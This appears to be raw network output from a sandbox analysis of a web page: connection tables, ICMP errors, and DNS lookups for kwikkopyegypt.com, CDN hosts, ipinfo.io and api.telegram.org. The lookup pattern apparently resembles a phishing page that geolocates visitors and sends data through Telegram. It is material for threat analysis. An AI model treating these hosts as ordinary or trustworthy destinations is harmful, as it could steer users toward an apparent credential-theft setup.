                                                                                                    Mar 10, 2025 13:51:23.702197075 CET4435400834.117.59.81192.168.2.24
                                                                                                    Mar 10, 2025 13:51:23.702299118 CET4435400834.117.59.81192.168.2.24
                                                                                                    Mar 10, 2025 13:51:23.702485085 CET54008443192.168.2.2434.117.59.81
                                                                                                    Mar 10, 2025 13:51:23.703443050 CET54008443192.168.2.2434.117.59.81
                                                                                                    Mar 10, 2025 13:51:23.703490973 CET4435400834.117.59.81192.168.2.24
                                                                                                    Mar 10, 2025 13:51:23.901129961 CET44354009149.154.167.220192.168.2.24
                                                                                                    Mar 10, 2025 13:51:23.931852102 CET44354009149.154.167.220192.168.2.24
                                                                                                    Mar 10, 2025 13:51:23.931931019 CET54009443192.168.2.24149.154.167.220
                                                                                                    Mar 10, 2025 13:51:23.932312965 CET54009443192.168.2.24149.154.167.220
                                                                                                    Mar 10, 2025 13:51:23.932327986 CET44354009149.154.167.220192.168.2.24
                                                                                                    Mar 10, 2025 13:51:23.936492920 CET54011443192.168.2.24149.154.167.220
                                                                                                    Mar 10, 2025 13:51:23.936541080 CET44354011149.154.167.220192.168.2.24
                                                                                                    Mar 10, 2025 13:51:23.936635017 CET54011443192.168.2.24149.154.167.220
                                                                                                    Mar 10, 2025 13:51:23.936934948 CET54011443192.168.2.24149.154.167.220
                                                                                                    Mar 10, 2025 13:51:23.936947107 CET44354011149.154.167.220192.168.2.24
                                                                                                    Mar 10, 2025 13:51:25.930782080 CET44354011149.154.167.220192.168.2.24
                                                                                                    Mar 10, 2025 13:51:25.931132078 CET54011443192.168.2.24149.154.167.220
                                                                                                    Mar 10, 2025 13:51:25.931164980 CET44354011149.154.167.220192.168.2.24
                                                                                                    Mar 10, 2025 13:51:25.931463003 CET44354011149.154.167.220192.168.2.24
                                                                                                    Mar 10, 2025 13:51:25.931890011 CET54011443192.168.2.24149.154.167.220
                                                                                                    Mar 10, 2025 13:51:25.931948900 CET44354011149.154.167.220192.168.2.24
                                                                                                    Mar 10, 2025 13:51:25.932051897 CET54011443192.168.2.24149.154.167.220
                                                                                                    Mar 10, 2025 13:51:25.976335049 CET44354011149.154.167.220192.168.2.24
                                                                                                    Mar 10, 2025 13:51:26.479440928 CET44354011149.154.167.220192.168.2.24
                                                                                                    Mar 10, 2025 13:51:26.479521036 CET44354011149.154.167.220192.168.2.24
                                                                                                    Mar 10, 2025 13:51:26.479655027 CET54011443192.168.2.24149.154.167.220
                                                                                                    Mar 10, 2025 13:51:26.480678082 CET54011443192.168.2.24149.154.167.220
                                                                                                    Mar 10, 2025 13:51:26.480710983 CET44354011149.154.167.220192.168.2.24
                                                                                                    Mar 10, 2025 13:51:29.006551981 CET54013443192.168.2.24141.193.213.21
                                                                                                    Mar 10, 2025 13:51:29.006616116 CET44354013141.193.213.21192.168.2.24
                                                                                                    Mar 10, 2025 13:51:29.006686926 CET54013443192.168.2.24141.193.213.21
                                                                                                    Mar 10, 2025 13:51:29.009259939 CET5401480192.168.2.24141.193.213.21
                                                                                                    Mar 10, 2025 13:51:29.009402037 CET5401580192.168.2.24141.193.213.21
                                                                                                    Mar 10, 2025 13:51:29.009798050 CET54013443192.168.2.24141.193.213.21
                                                                                                    Mar 10, 2025 13:51:29.009824038 CET44354013141.193.213.21192.168.2.24
                                                                                                    Mar 10, 2025 13:51:29.014444113 CET8054014141.193.213.21192.168.2.24
                                                                                                    Mar 10, 2025 13:51:29.014476061 CET8054015141.193.213.21192.168.2.24
                                                                                                    Mar 10, 2025 13:51:29.014547110 CET5401480192.168.2.24141.193.213.21
                                                                                                    Mar 10, 2025 13:51:29.014571905 CET5401580192.168.2.24141.193.213.21
                                                                                                    Mar 10, 2025 13:51:29.334537983 CET53987443192.168.2.24104.18.10.207
                                                                                                    Mar 10, 2025 13:51:29.334608078 CET44353987104.18.10.207192.168.2.24
                                                                                                    Mar 10, 2025 13:51:29.631856918 CET53979443192.168.2.24172.64.147.188
                                                                                                    Mar 10, 2025 13:51:29.631901979 CET44353979172.64.147.188192.168.2.24
                                                                                                    Mar 10, 2025 13:51:29.695050955 CET53986443192.168.2.24104.18.11.207
                                                                                                    Mar 10, 2025 13:51:29.695074081 CET44353986104.18.11.207192.168.2.24
                                                                                                    Mar 10, 2025 13:51:31.353295088 CET44354013141.193.213.21192.168.2.24
                                                                                                    Mar 10, 2025 13:51:31.353626966 CET54013443192.168.2.24141.193.213.21
                                                                                                    Mar 10, 2025 13:51:31.353712082 CET44354013141.193.213.21192.168.2.24
                                                                                                    Mar 10, 2025 13:51:31.354958057 CET44354013141.193.213.21192.168.2.24
                                                                                                    Mar 10, 2025 13:51:31.355029106 CET54013443192.168.2.24141.193.213.21
                                                                                                    Mar 10, 2025 13:51:31.356117010 CET54013443192.168.2.24141.193.213.21
                                                                                                    Mar 10, 2025 13:51:31.356194019 CET44354013141.193.213.21192.168.2.24
                                                                                                    Mar 10, 2025 13:51:31.356372118 CET54013443192.168.2.24141.193.213.21
                                                                                                    Mar 10, 2025 13:51:31.356408119 CET44354013141.193.213.21192.168.2.24
                                                                                                    Mar 10, 2025 13:51:31.397114038 CET54013443192.168.2.24141.193.213.21
                                                                                                    Mar 10, 2025 13:51:31.790586948 CET44354013141.193.213.21192.168.2.24
                                                                                                    Mar 10, 2025 13:51:31.812326908 CET44354013141.193.213.21192.168.2.24
                                                                                                    Mar 10, 2025 13:51:31.816272974 CET54013443192.168.2.24141.193.213.21
                                                                                                    Mar 10, 2025 13:51:31.817430973 CET54013443192.168.2.24141.193.213.21
                                                                                                    Mar 10, 2025 13:51:31.817471027 CET44354013141.193.213.21192.168.2.24
                                                                                                    Mar 10, 2025 13:51:31.901777983 CET54016443192.168.2.24141.193.213.21
                                                                                                    Mar 10, 2025 13:51:31.901835918 CET44354016141.193.213.21192.168.2.24
                                                                                                    Mar 10, 2025 13:51:31.901932955 CET54016443192.168.2.24141.193.213.21
                                                                                                    Mar 10, 2025 13:51:31.902869940 CET54016443192.168.2.24141.193.213.21
                                                                                                    Mar 10, 2025 13:51:31.902888060 CET44354016141.193.213.21192.168.2.24
                                                                                                    Mar 10, 2025 13:51:33.336033106 CET54017443192.168.2.24172.217.18.4
                                                                                                    Mar 10, 2025 13:51:33.336086988 CET44354017172.217.18.4192.168.2.24
                                                                                                    Mar 10, 2025 13:51:33.336147070 CET54017443192.168.2.24172.217.18.4
                                                                                                    Mar 10, 2025 13:51:33.336492062 CET54017443192.168.2.24172.217.18.4
                                                                                                    Mar 10, 2025 13:51:33.336509943 CET44354017172.217.18.4192.168.2.24
                                                                                                    Mar 10, 2025 13:51:34.100678921 CET44354016141.193.213.21192.168.2.24
                                                                                                    Mar 10, 2025 13:51:34.101116896 CET54016443192.168.2.24141.193.213.21
                                                                                                    Mar 10, 2025 13:51:34.101140976 CET44354016141.193.213.21192.168.2.24
                                                                                                    Mar 10, 2025 13:51:34.101623058 CET44354016141.193.213.21192.168.2.24
                                                                                                    Mar 10, 2025 13:51:34.101955891 CET54016443192.168.2.24141.193.213.21
                                                                                                    Mar 10, 2025 13:51:34.102035046 CET44354016141.193.213.21192.168.2.24
                                                                                                    Mar 10, 2025 13:51:34.102139950 CET54016443192.168.2.24141.193.213.21
                                                                                                    Mar 10, 2025 13:51:34.144345999 CET44354016141.193.213.21192.168.2.24
                                                                                                    Mar 10, 2025 13:51:34.146706104 CET54016443192.168.2.24141.193.213.21
                                                                                                    Mar 10, 2025 13:51:34.240564108 CET53991443192.168.2.2413.32.27.129
                                                                                                    Mar 10, 2025 13:51:34.240607023 CET4435399113.32.27.129192.168.2.24
                                                                                                    Mar 10, 2025 13:51:34.550574064 CET44354016141.193.213.21192.168.2.24
                                                                                                    Mar 10, 2025 13:51:34.572686911 CET44354016141.193.213.21192.168.2.24
                                                                                                    Mar 10, 2025 13:51:34.572928905 CET54016443192.168.2.24141.193.213.21
                                                                                                    Mar 10, 2025 13:51:34.573609114 CET54016443192.168.2.24141.193.213.21
                                                                                                    Mar 10, 2025 13:51:34.573635101 CET44354016141.193.213.21192.168.2.24
                                                                                                    Mar 10, 2025 13:51:34.943734884 CET53997443192.168.2.24104.21.26.223
                                                                                                    Mar 10, 2025 13:51:34.943770885 CET44353997104.21.26.223192.168.2.24
                                                                                                    Mar 10, 2025 13:51:35.445449114 CET44354017172.217.18.4192.168.2.24
                                                                                                    Mar 10, 2025 13:51:35.445895910 CET54017443192.168.2.24172.217.18.4
                                                                                                    Mar 10, 2025 13:51:35.445916891 CET44354017172.217.18.4192.168.2.24
                                                                                                    Mar 10, 2025 13:51:35.446799994 CET44354017172.217.18.4192.168.2.24
                                                                                                    Mar 10, 2025 13:51:35.446882010 CET54017443192.168.2.24172.217.18.4
                                                                                                    Mar 10, 2025 13:51:35.448086023 CET54017443192.168.2.24172.217.18.4
                                                                                                    Mar 10, 2025 13:51:35.448147058 CET44354017172.217.18.4192.168.2.24
                                                                                                    Mar 10, 2025 13:51:35.490593910 CET54017443192.168.2.24172.217.18.4
                                                                                                    Mar 10, 2025 13:51:35.490611076 CET44354017172.217.18.4192.168.2.24
                                                                                                    Mar 10, 2025 13:51:35.537338972 CET54017443192.168.2.24172.217.18.4
                                                                                                    Mar 10, 2025 13:51:44.393991947 CET8054014141.193.213.21192.168.2.24
                                                                                                    Mar 10, 2025 13:51:44.394180059 CET5401480192.168.2.24141.193.213.21
                                                                                                    Mar 10, 2025 13:51:44.395843029 CET8054015141.193.213.21192.168.2.24
                                                                                                    Mar 10, 2025 13:51:44.395906925 CET5401580192.168.2.24141.193.213.21
                                                                                                    Mar 10, 2025 13:51:45.099771023 CET44354017172.217.18.4192.168.2.24
                                                                                                    Mar 10, 2025 13:51:45.099850893 CET44354017172.217.18.4192.168.2.24
                                                                                                    Mar 10, 2025 13:51:45.099931955 CET54017443192.168.2.24172.217.18.4
                                                                                                    Mar 10, 2025 13:51:46.149662018 CET54017443192.168.2.24172.217.18.4
                                                                                                    Mar 10, 2025 13:51:46.149662971 CET5401480192.168.2.24141.193.213.21
                                                                                                    Mar 10, 2025 13:51:46.149662971 CET5401580192.168.2.24141.193.213.21
                                                                                                    Mar 10, 2025 13:51:46.149713039 CET44354017172.217.18.4192.168.2.24
                                                                                                    Mar 10, 2025 13:51:46.154732943 CET8054015141.193.213.21192.168.2.24
                                                                                                    Mar 10, 2025 13:51:46.154747963 CET8054014141.193.213.21192.168.2.24
                                                                                                    Mar 10, 2025 13:51:47.087897062 CET5401980192.168.2.24172.217.18.3
                                                                                                    Mar 10, 2025 13:51:47.092986107 CET8054019172.217.18.3192.168.2.24
                                                                                                    Mar 10, 2025 13:51:47.093090057 CET5401980192.168.2.24172.217.18.3
                                                                                                    Mar 10, 2025 13:51:47.093182087 CET5401980192.168.2.24172.217.18.3
                                                                                                    Mar 10, 2025 13:51:47.098170996 CET8054019172.217.18.3192.168.2.24
                                                                                                    Mar 10, 2025 13:51:47.743175983 CET8054019172.217.18.3192.168.2.24
                                                                                                    Mar 10, 2025 13:51:47.788269997 CET5401980192.168.2.24172.217.18.3
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Mar 10, 2025 13:50:29.976648092 CET53545561.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:29.988877058 CET53519031.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:33.274200916 CET6054453192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:33.274338007 CET5859553192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:33.281416893 CET53605441.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:33.281987906 CET53585951.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:33.386450052 CET53505791.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:34.969814062 CET53515011.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:35.650803089 CET5191553192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:35.650995016 CET6412453192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:35.667504072 CET53641241.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:35.674690008 CET53519151.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.873193979 CET53625181.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.878232002 CET5474353192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:39.878400087 CET5889753192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:39.880723000 CET5833153192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:39.880881071 CET5034353192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:39.885864973 CET53588971.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.886365891 CET53547431.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.887204885 CET53512821.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.887391090 CET5823253192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:39.887597084 CET5536853192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:39.887664080 CET53583311.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.888350964 CET53503431.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.888639927 CET6206553192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:39.888941050 CET5058253192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:39.889374018 CET5076953192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:39.889549971 CET5844753192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:39.894634962 CET53582321.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.894665956 CET53553681.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.895827055 CET53620651.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.896498919 CET53507691.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.897001028 CET53505821.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:39.897206068 CET53584471.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:44.738440990 CET5544353192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:44.738931894 CET5708053192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:44.746066093 CET53554431.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:44.747406960 CET53570801.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:44.761197090 CET53536541.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:44.772964954 CET5850653192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:44.773142099 CET5493253192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:44.780092001 CET53585061.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:44.780211926 CET53549321.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:45.470107079 CET5896653192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:45.470268965 CET5016853192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:45.479345083 CET53501681.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:45.490843058 CET53589661.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:45.493098021 CET5675353192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:45.493251085 CET6483353192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:45.500693083 CET53567531.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:45.501178026 CET53648331.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:52.234652042 CET53501371.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:57.092505932 CET6304853192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:57.092708111 CET5441053192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:57.099935055 CET53544101.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:57.100425005 CET53630481.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:58.251279116 CET53557251.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:59.600452900 CET6313453192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:59.600732088 CET5088553192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:59.602911949 CET5102753192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:59.603091002 CET6512353192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:50:59.607584000 CET53631341.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:59.607888937 CET53508851.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:59.610879898 CET53651231.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:50:59.611387968 CET53510271.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:51:01.978142023 CET5849953192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:51:01.978687048 CET5195053192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:51:01.980726957 CET5374753192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:51:01.980911970 CET5676253192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:51:01.986073017 CET53584991.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:51:01.986644983 CET53519501.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:51:01.988356113 CET53537471.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:51:01.989507914 CET53567621.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:51:04.596995115 CET5319853192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:51:04.597141981 CET6153153192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:51:04.605614901 CET53531981.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:51:04.622756004 CET53615311.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:51:08.027874947 CET137137192.168.2.24192.168.2.255
                                                                                                    Mar 10, 2025 13:51:08.772170067 CET137137192.168.2.24192.168.2.255
                                                                                                    Mar 10, 2025 13:51:09.537240982 CET137137192.168.2.24192.168.2.255
                                                                                                    Mar 10, 2025 13:51:11.048175097 CET53559151.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:51:28.910696030 CET53508231.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:51:28.960576057 CET5310553192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:51:28.960782051 CET5554653192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:51:28.985730886 CET5321653192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:51:28.985929966 CET5427353192.168.2.241.1.1.1
                                                                                                    Mar 10, 2025 13:51:28.998354912 CET53532161.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:51:28.998379946 CET53531051.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:51:29.011589050 CET53555461.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:51:29.133833885 CET53542731.1.1.1192.168.2.24
                                                                                                    Mar 10, 2025 13:51:33.968729973 CET53564381.1.1.1192.168.2.24
                                                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                                                    Mar 10, 2025 13:51:04.622831106 CET192.168.2.241.1.1.1c249(Port unreachable)Destination Unreachable
                                                                                                    Mar 10, 2025 13:51:29.011658907 CET192.168.2.241.1.1.1c254(Port unreachable)Destination Unreachable
                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Mar 10, 2025 13:50:33.274200916 CET192.168.2.241.1.1.10x549dStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:33.274338007 CET192.168.2.241.1.1.10xe004Standard query (0)www.google.com65IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:35.650803089 CET192.168.2.241.1.1.10x996dStandard query (0)kwikkopyegypt.comA (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:35.650995016 CET192.168.2.241.1.1.10x603aStandard query (0)kwikkopyegypt.com65IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:39.878232002 CET192.168.2.241.1.1.10x4cffStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:39.878400087 CET192.168.2.241.1.1.10x1869Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:39.880723000 CET192.168.2.241.1.1.10xfb9cStandard query (0)kit.fontawesome.comA (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:39.880881071 CET192.168.2.241.1.1.10xae35Standard query (0)kit.fontawesome.com65IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:39.887391090 CET192.168.2.241.1.1.10xddb6Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:39.887597084 CET192.168.2.241.1.1.10xe0dbStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:39.888639927 CET192.168.2.241.1.1.10x9ec2Standard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:39.888941050 CET192.168.2.241.1.1.10xe60aStandard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:39.889374018 CET192.168.2.241.1.1.10xdf56Standard query (0)stackpath.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:39.889549971 CET192.168.2.241.1.1.10x1331Standard query (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:44.738440990 CET192.168.2.241.1.1.10x1042Standard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:44.738931894 CET192.168.2.241.1.1.10x491cStandard query (0)logo.clearbit.com65IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:44.772964954 CET192.168.2.241.1.1.10xbbf0Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:44.773142099 CET192.168.2.241.1.1.10x90bbStandard query (0)www.google.com65IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:45.470107079 CET192.168.2.241.1.1.10xad1bStandard query (0)image.thum.ioA (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:45.470268965 CET192.168.2.241.1.1.10x2590Standard query (0)image.thum.io65IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:45.493098021 CET192.168.2.241.1.1.10x7b59Standard query (0)ka-f.fontawesome.comA (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:45.493251085 CET192.168.2.241.1.1.10x7375Standard query (0)ka-f.fontawesome.com65IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:57.092505932 CET192.168.2.241.1.1.10x1195Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:57.092708111 CET192.168.2.241.1.1.10xc6aStandard query (0)ipinfo.io65IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:59.600452900 CET192.168.2.241.1.1.10x5cebStandard query (0)dns.googleA (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:59.600732088 CET192.168.2.241.1.1.10x4bc6Standard query (0)dns.google65IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:59.602911949 CET192.168.2.241.1.1.10xd904Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:59.603091002 CET192.168.2.241.1.1.10x194eStandard query (0)ipinfo.io65IN (0x0001)false
                                                                                                    Mar 10, 2025 13:51:01.978142023 CET192.168.2.241.1.1.10x8502Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:51:01.978687048 CET192.168.2.241.1.1.10x82b7Standard query (0)api.telegram.org65IN (0x0001)false
                                                                                                    Mar 10, 2025 13:51:01.980726957 CET192.168.2.241.1.1.10xaeddStandard query (0)dns.googleA (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:51:01.980911970 CET192.168.2.241.1.1.10x9608Standard query (0)dns.google65IN (0x0001)false
                                                                                                    Mar 10, 2025 13:51:04.596995115 CET192.168.2.241.1.1.10x7c6dStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:51:04.597141981 CET192.168.2.241.1.1.10x18f7Standard query (0)api.telegram.org65IN (0x0001)false
                                                                                                    Mar 10, 2025 13:51:28.960576057 CET192.168.2.241.1.1.10xa481Standard query (0)www.southwark.anglican.orgA (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:51:28.960782051 CET192.168.2.241.1.1.10xd5d8Standard query (0)www.southwark.anglican.org65IN (0x0001)false
                                                                                                    Mar 10, 2025 13:51:28.985730886 CET192.168.2.241.1.1.10xb86aStandard query (0)www.southwark.anglican.orgA (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:51:28.985929966 CET192.168.2.241.1.1.10x8fdcStandard query (0)www.southwark.anglican.org65IN (0x0001)false
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Mar 10, 2025 13:50:33.281416893 CET1.1.1.1192.168.2.240x549dNo error (0)www.google.com172.217.18.4A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:33.281987906 CET1.1.1.1192.168.2.240xe004No error (0)www.google.com65IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:35.674690008 CET1.1.1.1192.168.2.240x996dNo error (0)kwikkopyegypt.com50.62.201.28A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:39.886365891 CET1.1.1.1192.168.2.240x4cffNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:39.886365891 CET1.1.1.1192.168.2.240x4cffNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:39.886365891 CET1.1.1.1192.168.2.240x4cffNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:39.886365891 CET1.1.1.1192.168.2.240x4cffNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:39.887664080 CET1.1.1.1192.168.2.240xfb9cNo error (0)kit.fontawesome.comkit.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:39.887664080 CET1.1.1.1192.168.2.240xfb9cNo error (0)kit.fontawesome.com.cdn.cloudflare.net172.64.147.188A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:39.887664080 CET1.1.1.1192.168.2.240xfb9cNo error (0)kit.fontawesome.com.cdn.cloudflare.net104.18.40.68A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:39.888350964 CET1.1.1.1192.168.2.240xae35No error (0)kit.fontawesome.comkit.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:39.894634962 CET1.1.1.1192.168.2.240xddb6No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:39.894634962 CET1.1.1.1192.168.2.240xddb6No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:39.894665956 CET1.1.1.1192.168.2.240xe0dbNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:39.895827055 CET1.1.1.1192.168.2.240x9ec2No error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:39.895827055 CET1.1.1.1192.168.2.240x9ec2No error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:39.896498919 CET1.1.1.1192.168.2.240xdf56No error (0)stackpath.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:39.896498919 CET1.1.1.1192.168.2.240xdf56No error (0)stackpath.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:39.897001028 CET1.1.1.1192.168.2.240xe60aNo error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:39.897206068 CET1.1.1.1192.168.2.240x1331No error (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:44.746066093 CET1.1.1.1192.168.2.240x1042No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:44.746066093 CET1.1.1.1192.168.2.240x1042No error (0)d26p066pn2w0s0.cloudfront.net13.32.27.129A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:44.746066093 CET1.1.1.1192.168.2.240x1042No error (0)d26p066pn2w0s0.cloudfront.net13.32.27.77A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 13:50:44.746066093 CET1.1.1.1192.168.2.240x1042No error (0)d26p066pn2w0s0.cloudfront.net13.32.27.14A (IP address)IN (0x0001)false
